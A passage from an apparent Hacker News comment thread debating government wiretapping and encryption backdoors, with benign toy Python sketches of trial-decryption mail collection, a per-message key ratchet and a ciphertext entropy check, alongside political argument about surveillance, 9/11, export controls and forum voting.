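        # Placeholder: yield every message body posted to the drop newsgroup.
        yield from []

    def try_decrypt(ciphertext):
        # Placeholder: return plaintext if the message decrypts with our key
        # (and the signature checks out), otherwise None.
        return None

    def collect_my_mail():
        inbox = []
        for msg in fetch_all_messages():
            plaintext = try_decrypt(msg)
            if plaintext is not None:      # only messages addressed to us decrypt
                inbox.append(plaintext)
        return inbox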
Yep, there are a thousand and one methods of communicating securely. Governments are just using this as an excuse to wiretap popular messaging services for general surveillance.
Unless they get away with making everyone dumber, they will fail.
This is not how it works. As long as enough people are not bothered, they will succeed.
I'd love to hear about either a possible alternative government structure in which there are no politicians or a way to attract the smartest people in governments.
When you consider the societal fallout and everything that has transpired since, the most insane part to me is that by its very occurrence, 9/11 itself already prevented the next 9/11. The "next 9/11" was to crash the fourth hijacked plane into a high-value target; the plane on which the passengers fought back, which was crashed in Pennsylvania, WAS the next 9/11. This was a tactic that was apprehended and adapted to before the day was out. It worked three times on one day, once. An update to the mental calculus of common folks was all it really took. If we had successfully prevented it re-shaping our society, it would have never, ever, ever worked again. This newfound understanding of the rules, coupled with a straightforward countermeasure like reinforced cockpit doors, would have closed off that vector of attack entirely.
19 malevolent people acting in 2001 have colored nearly two decades of policy for America. I remember two particular circulating ideas from the time: "they're attacking our way of life" and "they hate us because we are free." The latter was much more divisive and so people spent much more time arguing with each other about it. Meanwhile, whether intentionally on the part of the attackers or not, the first was very effectively accomplished.
Maybe if there had been no 9/11, the agencies charged with protecting Americans would have still been seduced by the ease with which modern technology enables broad surveillance. Maybe hoovering up all the data is too good an opportunity to pass up. Regardless, I yearn for, and still miss the end of history. Our hubris has been rewarded with interesting times.
If a legislator is not technically up to speed, considerable taxpayer money goes towards hiring people in government to do the research and the explaining. Some high-level advisers may come from organizations with a private agenda, and after a few years of working within the government these experts pop right back into their industry jobs and we don't hear of them anymore.
Ultimately it's the same need in whatever form of government we want - we need people we can trust.
The intention being that politicians are aware that they must be consistent with their words and actions throughout their term otherwise they will lose their seat.
Some months before the last big bailout legislation, we had a US Senate candidate in my state who was new to our political scene. He appeared as a local man with a law degree from our state university, and he spoke about how working people struggled with unemployment, delinquencies, etc., as he knew middle-class issues and could change the ways of Washington. PBS featured him, and I still remember the interview they aired from his kitchen in a middle-class home. I am among the people who voted him in.
A few years after this election I checked his voting records by chance and I realized that he had voted almost always in favor of the bailout system. I wouldn’t have known this by just reading the news or watching cable. In the next election cycle he won handily, this time supported by organizations with cash to blanket our news with favorable lines for him. That’s how life works I guess.
Of course he did not win because the other candidate was much better qualified and rural voters knew him en masse (he’s the one that signs checks for all the citizen stewards of oil fields), but I found it hilarious that people would flame me for not voting for a figurehead (president) but be a-ok to vote in some no name hack to manage our schools because of big money advertising in elections
In all seriousness this is the aim of all historical anarchist movements. Despite the propagandization of the term "anarchism", that philosophy has a long history of attempts and writers and thinkers, and it has more often than not "failed" when a powerful state entity violently disbanded the efforts or killed prominent leaders. In other cases anarchism has not failed at all but has existed in tribal communities in different ways long before european thinkers wrote on the subject.
In particular anarcho-communism or the more detailed Communalism of Murray Bookchin (The Next Revolution, 2015 https://www.penguinrandomhouse.com/books/239261/the-next-rev...) looks totally plausible to me.
The biggest issue with state-less society is the conflict with the existing state powers this philosophy creates. However the method of governance has found success in present day Mexico with the Zapatistas:
As well as Rojava in Syria:
So the core problem is that humans don't make great rulers. Nor are we good at selecting rulers.
Individuals are the flaw in the system. And a government without stupidity, means a government without humans.
But in that system, how do you allow leniency for the 40 year old single mother of 5 who accidentally switched lanes without using a turn signal?
Individuals also represent humanity in the government. We are not a nation of robots.
https://youtu.be/rgUs5wtXgL4 (the video is a bit dated unfortunately)
Funny story about that, those used to be considered controlled munitions.
As of 2009, non-military cryptography exports from the U.S. are controlled by the Department of Commerce's Bureau of Industry and Security. Some restrictions still exist, even for mass market products, particularly with regard to export to "rogue states" and terrorist organizations.
Militarized encryption equipment, TEMPEST-approved electronics, custom cryptographic software, and even cryptographic consulting services still require an export license.
Furthermore, encryption registration with the BIS is required for the export of "mass market encryption commodities, software and components with encryption exceeding 64 bits" (75 FR 36494). In addition, other items require a one-time review by, or notification to, BIS prior to export to most countries. For instance, the BIS must be notified before open-source cryptographic software is made publicly available on the Internet, though no review is required. Export regulations have been relaxed from pre-1996 standards, but are still complex. Other countries, notably those participating in the Wassenaar Arrangement, have similar restrictions.
We dislike it even though we would be forced to do the same thing in their position. We dislike it because we aren’t the ones in power. Again, as it goes in the jungle, life isn’t always fair.
However, I don't care if it "keeps us safe". It's just wrong in so many ways
The "terrorism" rationalization provided for this surveillance has nothing to do with reality. The United States government is not in any way involved in fighting the source of jihadist terrorism, and the state responsible for 9/11, Saudi Arabia. They are allies, and Trump's cabinet is now attempting to arm Saudi Arabia with nuclear weapons. The actual intent of this law is to surveil whistle-blowers and journalists. WhatsApp messages have already been used in the case against IRS whistle-blower John Fry, who exposed the Donald Trump-Michael Cohen hush payments.
Those apps that provide end-to-end encryption are a problem and they are working on solving it.
Claiming that they should not be able to wiretap lawfully (or even otherwise) is a rather naive view of the world and lawful wiretapping does not imply dystopia.
Are they though? There will always be a means to communicate without surveillance. Backdooring encryption is fundamentally incompatible with privacy, and will be abused - at scale.
For any real cases, the security services have a multitude of other ways of getting the information they need regardless - for example, they could gain physical access to the target's phone and backdoor/bug it, or swap it out with a backdoored/bugged one.
The real problem with backdooring or outlawing encryption is that it lowers the bar to entry for governments - it makes it too easy, and such sweeping powers will be abused.
That's a very bold claim.
Lawful wiretapping exists because it is accepted (and reasonable) that privacy should stop in specific circumstances, e.g. a criminal investigation.
As I wrote before seeing this in black or white is naive. Wiretapping is useful for society. The key is to have proper oversight.
By the way, to lawfully wiretap a phone the authorities only need the phone number: The operator will then duplicate all traffic transparently and on the fly. Bugging a phone really means illegal/covert operations these days...
When a weakness is introduced into that defense, even if it's a secret key held only by trusted governments and only (they promise) to be used in emergencies, that key is a method of attack that anyone, anywhere can use against everyone. The only defense is that the secret key remain secret, and there are an endless number of ways it could be compromised, ranging from human error to phishing to plain old brute forcing. A single key for all WhatsApp conversations is a valuable enough prize for criminals all over the world to invest serious money in custom hardware to crack it.
Currently, encryption schemes like Whatsapp's rely on generation of new keys for every message, making the value of attacking any one message limited. Without this defense, Whatsapp will be cracked, sooner or later. And once someone publicly reveals that key, every single message sent before that point becomes compromised. Maybe even publicly exposed. Would you be okay with that? Exposing your private message history to the internet because governments wanted to snoop?
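For anyone unfamiliar with why per-message keys matter, here's a toy symmetric ratchet in Python. It's a simplification of the general idea, not WhatsApp's actual Double Ratchet, but it shows the property: each message key is used once and the chain only moves forward, so there's no single long-lived key whose theft unlocks the whole history.

    # Toy symmetric hash ratchet (a simplification, not the real Double Ratchet).
    # Each message key is derived from a chain key that is immediately replaced,
    # so compromising one message key reveals neither earlier nor later keys.
    import hashlib
    import hmac

    def kdf(chain_key: bytes, label: bytes) -> bytes:
        return hmac.new(chain_key, label, hashlib.sha256).digest()

    def ratchet_step(chain_key: bytes):
        message_key = kdf(chain_key, b"message")   # used once, then discarded
        next_chain = kdf(chain_key, b"chain")      # one-way step: can't go backwards
        return message_key, next_chain

    chain = hashlib.sha256(b"shared-secret-from-key-agreement").digest()
    for i in range(3):
        mk, chain = ratchet_step(chain)
        print(f"message {i} key: {mk.hex()[:16]}...")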
If there is a key which decrypts everything, then there is a risk it can be stolen or guessed and used to decrypt anyone's messages. This risk does not exist in current, properly designed systems.
Any government which wishes to add a backdoor to an E2E encrypted messaging system must understand that they will be HEAVILY undermining the security and privacy rights for all users of the service which has the backdoor.
Whatsapp decided to go for E2E encryption for commercial and marketing purposes following all those privacy scandals.
They did not have to. They could have gone with plain point-to-point (client-to-server) encryption, i.e. their databases could have stored messages in cleartext. That way the authorities would not have needed to ask for any backdoor. As already mentioned, this is how cellular operators work (and that's obviously something governments wanted).
I think we might see legislation brought in in the future in order to force this.
Okay. Let's just get rid of E2E entirely and let Facebook mine not only our metadata but also the content of our messages. Nice plan.
> let Facebook mine not only our metadata...
Don't use Facebook, then.
Yes, but if you make it too easy, oversight fails or is worked around with legalese, and the powers are abused at scale.
> Bugging a phone really means illegal/covert operations these days
My view here is that it should be difficult - the security services should only be able to intercept someone's communications with a legally obtained warrant to do so (the oversight you mentioned); then the powers are far more likely to be used only where there is a credible threat.
Here's a case where the courts say that police surveillance was not correctly authorised: https://www.bailii.org/uk/cases/UKIPTrib/2018/IPT_17_93_H.ht...
I hold the opposite view: the idea that the evolutionary trajectory of the internet will continue to allow "wiretapping" (and, for that matter, the existence of a capricious state tout court) is the naive view.
The state is looking increasingly obsolete every day, and moves like this are significant leaps forward in solidifying that conclusion.
The implementation of AES in popular CPUs? Yeah, who knows.
Politicians, generally, are not hypocrites. That implies the guise of good faith. Do you really think the biggest beneficiaries of terrorism are likely to be honest with you? Humans just like being told what to do and what to fear and whom to be mad at, and politicians make eager use of this role.
From the government's perspective, they are to keep "us" safe. It's easier to do that if no one's safe from us. :)
Granted, that's a little over-ominous because the government's mission statement is to keep its people safe, and it's also elected by its people. Either of these two facts changing is the way bigger danger; backdooring centralized services is stuff that happens in the meantime either way.
Even if this or that individual politician gets voted out, or even ten of them, it won't stop the machine's influence. They're still the ones who decide who the replacements can be chosen from.
Strangely, HN is also very much in favor of the administration’s trade protectionism.
Yes. Absolutely. That's the only logical endgame.
That's pretty far detached from real rocketry.
A similar metaphor for computing would be the allowed use of a LeapFrog system, rather than a computer.
'My cryptography hobby is going pretty well, I just practiced a Caesar cipher on my LeapFrog.'
(neither a LeapFrog nor a model rocket being a practical equivalent of their big relatives.)
If the goal is to catch malicious people that are trying to hide their communications, then outlawing encryption won't work. But it will give the government a good excuse to spy on people.
I don't think this is the right analogy - instead, I think a better statement would be "you can't outlaw random numbers".
A random number and the ciphertext output of a secure encryption algorithm should be indistinguishable.
I don't think I am being naive to think that even in our wildest dystopian nightmares there is no real path from (current jurisprudence in five-eyes jurisdictions) to (random numbers being illegal).
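A quick, crude sanity check of the "ciphertext looks like random bytes" claim. This assumes the third-party cryptography package is installed, and entropy-per-byte is obviously not a proof of indistinguishability (which is a formal, computational notion), just an illustration:

    # Compare a crude entropy estimate of structured plaintext, AES-CTR ciphertext,
    # and os.urandom output. Requires the third-party 'cryptography' package.
    import math
    import os
    from collections import Counter
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def byte_entropy(data: bytes) -> float:
        counts = Counter(data)
        n = len(data)
        return -sum(c / n * math.log2(c / n) for c in counts.values())   # max is 8.0

    plaintext = b"attack at dawn. " * 4096                # highly structured input
    key, nonce = os.urandom(32), os.urandom(16)
    enc = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor()
    ciphertext = enc.update(plaintext) + enc.finalize()

    print("plaintext  entropy:", round(byte_entropy(plaintext), 3))   # low, ~3 bits/byte
    print("ciphertext entropy:", round(byte_entropy(ciphertext), 3))  # ~8 bits/byte
    print("os.urandom entropy:", round(byte_entropy(os.urandom(len(ciphertext))), 3))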
And you can bet those people do understand encryption.
As far as Slack goes... I trust them as much as I trust Discord: I do not.
Residents of the US are still free to use whatever mathematical algorithm they want to encrypt their comms. Transporting OTPs across physical borders is trivial, and not technically illegal if I'm not mistaken. Strong encryption is open source, as you've pointed out. There's no law against using those open source libraries, nor any discussion to try to censor/outlaw them, AFAIK.
Policing the airwaves and internet pipes hardly qualifies as some major abuse of human rights, particularly when the best that the Intercept/Snowden crowd can come up with regarding things like "Parallel Reconstruction" is "abuse" of "surveillance power" to catch, e.g., methamphetamine traffickers.
edit: Downvote due to disagreement? This seems to be the mantra of HN in recent years.
The leaders of today are not the same as those of tomorrow - sweeping powers to invade anyone's privacy and communications could easily be used for nefarious purposes. I don't trust our current leaders with such powers, much less potentially worse ones.
> Residents of the US are still free to use whatever mathematical algorithm they want to encrypt their comms. Transporting OTP's across physical borders is trivial, and not technically illegally if not mistaken. Strong encryption is open source as you've pointed out. There's no law against using those open source libraries, nor any discussion to try to censor/outlaw them, AFAIK.
Do you really think things will stay this way?
It seems to me that TFA is just the next step on a slow, but steady, march towards an authoritarian nightmare - once they've worn us down some more, there will be serious moves against encryption (it's happened before, and politicians have been bringing it up a lot in the past 10 years or so).
I think it's ok to use the up and down arrows to express agreement. Obviously the uparrows aren't only for applauding politeness, so it seems reasonable that the downarrows aren't only for booing rudeness.
It only becomes abuse when people resort to karma bombing: downvoting a lot of comments by one user without reading them in order to subtract maximum karma. Fortunately we now have several levels of software to protect against that.
Please don't comment about the voting on comments. It never does any good, and it makes boring reading.
But I always always downvote complaints about downvotes, such as your edit.
I downvote quite rarely in HN over disagreeing with someone. Usually it is when I don't feel the reply adds any value, and is actually negative for the discourse.
That is, it e.g. doesn't teach me anything about the opposing position, or is argumentative without any substance, distracting from comments that are more constructive.
Of course other people use different judgement. At the same time, HN doesn't hide comments to a great extent. Even 'dead' comments are optionally visible (with the 'showdead' setting) and quite a few of us read HN with that on. It's very rare for downvotes to silence people here who aren't actively disruptive.
Couple that with first enabling downvotes when people hit a certain karma threshold, and various other limitations, and HN is free of a lot of the downvote problems of other places.
That to me makes it less of an issue if people downvote to signal disapproval here.
Often initial downvotes will be countered when people feel a comment has been downvoted too much, as well.
If you are a US citizen, maybe; for the rest of the world, definitely not.
Without being a lawyer, I'm pretty sure random drone strikes on civilians in Pakistan, torture in Guantanamo, or intercepting the entire world's communications are not examples of "respect for human rights".
This is a good point, I think. The US has an appalling record on human rights (aside from your examples, arming terrorists and overthrowing democratically elected governments spring to mind) - as long as we're talking about the rights of non-Americans.
Some of those individuals were guilty of little more than political activism but experienced real harm (e.g. deportation) thanks to surveillance overreach.
Which in practice is done by using machine learning on huge data sets gathered with that global surveillance, enabled through Five Eyes.
Because the army of humans that could manually sort through those zettabytes of data has yet to be cloned. All of that ends up in the fancy-sounding "disposition matrix", aka the USG's kill-list. It's just systems upon systems doing their thing, and nobody is directly responsible or accountable for anything that ends up happening, like when yet another 30 Afghan farmers get "splatted" by accident.
Considering how this has been going on for close to two decades, and the US has a very convenient way of going about the casualty statistics, I guess these Afghan farmers are just another rounding error in the "war on terror". Figures, because before that they were mostly considered biometric cattle and lab rats for fantasies about "full-spectrum surveillance".
Note: Under Trump, the USG has now even stopped releasing its shined-up drone statistics. So it's pretty much impossible to know the full scale of what's still going on to this day.
I mostly remember the headline, Google does the rest of leading me back to the article.